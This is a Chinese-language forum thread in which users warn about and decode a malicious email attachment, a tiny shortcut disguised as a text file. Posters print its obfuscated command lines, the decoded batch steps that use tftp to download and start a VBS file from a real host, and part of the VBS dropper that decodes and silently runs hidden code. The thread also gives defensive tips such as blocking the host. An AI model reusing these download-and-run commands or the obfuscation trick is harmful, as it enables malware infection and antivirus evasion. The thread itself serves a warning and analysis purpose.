剛收到的信件附加檔覺得很可疑!
 

[img]http://uason.d-y-u.com/images/Virus.JPG[/img]
他附加檔很小.
只有1K.
解壓縮後是一個類似捷徑的圖示.
執行指令如下.
[CODE]
%CoMsPEC% /C ecHo %M%%X%%M%P%A%%m%%x%%m%%X%%m%.NE%M%%a%gE%m%%A%%M%%a%F.Vbs>O.BAT&echo S%M%AR%M%%a%f.vBS>>o.BaT&SEt M=t&sEt x=f&SEt a= &O.bAT
[/CODE]

也請各位網友多注意這種散播方式!

回覆: 剛收到的信件附加欓覺得很可疑!
 

解出來就是這樣：
[code]%CoMsPEC% /C ecHo tftP tftft.NEt gEt t F.Vbs>O.BAT
echo StARt f.vBS>>o.BaT
o.bat[/code]

o.bat 的內容就會是這樣：
[code]tftP tftft.NEt gEt t F.Vbs
StARt f.vBS[/code]

抓下來的 F.VBs 內容：
[code]sub k
for i=1 to UBound(s)
r=r&chr(s(i)-823)
next
Set kk = CreateObject("Wscript.Shell")
kk.run r,0
end sub
s=array(836,922 ... 中略 ... 942,870)
k[/code]

至於執行後有啥後果?
就要試試才知道了.

以上資料轉自 [url=http://www.threesecond.info/v2/modules/xhnewbb/viewtopic.php?topic_id=1706&post_id=6725]三秒練功房[/url]

回覆: 剛收到的信件附加欓覺得很可疑!
 

用這種方式來躲避防毒軟體已經流行一陣子了
只要連結還在，那麼下載的病毒就能不斷變種

回覆: 剛收到的信件附加欓覺得很可疑!
 

ㄉㄌ不分是這類信的特徵

回覆: 剛收到的信件附加檔覺得很可疑!
 

我的Hotmail信箱也從在線上遊戲認識不久的網友那收到了類似的東西，問她有沒有寄，他說沒有。

以下是信件內容，這些人想必跟盜帳號還有詐騙集團有牽連，希望牠們趕快被抓去關。([U][COLOR="Red"]附上病毒檔案, 請小心取用; [/COLOR][/U]下載後檔名是: _玩笑.zip_, 我只改了檔名)
===================================================

♂∵▼我把你的照片拼裝成這樣拉↖×⊙‏
寄件者： X X ([email protected])
寄件日期： 2009年11月25日 上午 05:56:12
收件者： [email protected]

附件： 1 個附件
玩笑.zip (1.1 KB)

只是和你開個玩笑而已
我把你的照片拼裝成這樣拉,看看,是不是粉有意思,不過你可不要生氣
我只是跟你開個玩笑而已!!!不過很好玩



























































∵∴◇←◆××◇▽↖↑∵∵▼▽▽◆﹥◇←↖■▽→▽﹦↓←◇﹥

回覆: 剛收到的信件附加檔覺得很可疑!
 

它是會不斷更新的，我朋友的電腦中了此毒，第一次他電腦傳給我類似的電郵，防毒掃了沒有反應；

第二次傳來，電郵主旨內容都不同，但是附件都是1.1k大小，防毒開始認到它是病毒；

今天，第三次傳來，電郵主旨內容又改了，但是附件都是1.1k大小 ，可惜的是，防毒又掃不到了，所以說此毒會自動更新的

回覆: 剛收到的信件附加檔覺得很可疑!
 

[QUOTE]%COmsPec% /C EChO %d%Tp%N%%d%%D%T.neT%n%GEt%n%T%N%W.Vbs>b.BAT
&ecHO START%N%w.VBS>>B.BAT&sEt d=tF&seT n= &B.BAt[/QUOTE]

我不會解碼:|||:，以上是它的命令列參數，看起來跟發文大收到的木馬檔是同一系列。

附圖：它故意把自己的圖示弄成文字檔的，開啟後會自動縮小視窗執行以上指令。

回覆: 剛收到的信件附加檔覺得很可疑!
 

[QUOTE=大灰芒果;1076451]我不會解碼:|||:，以上是它的命令列參數，看起來跟發文大收到的木馬檔是同一系列。

附圖：它故意把自己的圖示弄成文字檔的，開啟後會自動縮小視窗執行以上指令。[/QUOTE]
[CODE]
%COmsPec% /C EChO %d%Tp%N%%d%%D%T.neT%n%GEt%n%T%N%W.Vbs>b.BAT
ecHO START%N%w.VBS>>B.BAT
sEt d=tF
seT n=
B.BAt[/CODE]
解完
[CODE]
%COmsPec% /C EChO tFTp tFtFT.neT GEt T W.Vbs>b.BAT
ecHO START w.VBS>>B.BAT
B.BAt[/CODE]
b.bat內容就是...
[CODE]
tFTp tFtFT.neT GEt T W.Vbs
START w.VBS
[/CODE]
基本上跟uason是差不多的
只是換個檔名而已

現在這種.lnk的,看到會膩了...
而且目前也少見相當多了,
大概大家都有因應的對付方法

請把BAT & CMD 預設關聯程式改成記事本, VBS 也比照辦理, 或是只改BAT & CMD, 反正這三種類型的程式用到的機會實在很低

回覆: 剛收到的信件附加檔覺得很可疑!
 

我已經在hosts增加一筆資料
127.0.0.1 tftft.NEt
暫時可以防止連上該站.
不過這種惡意網址以後可能會越來越多!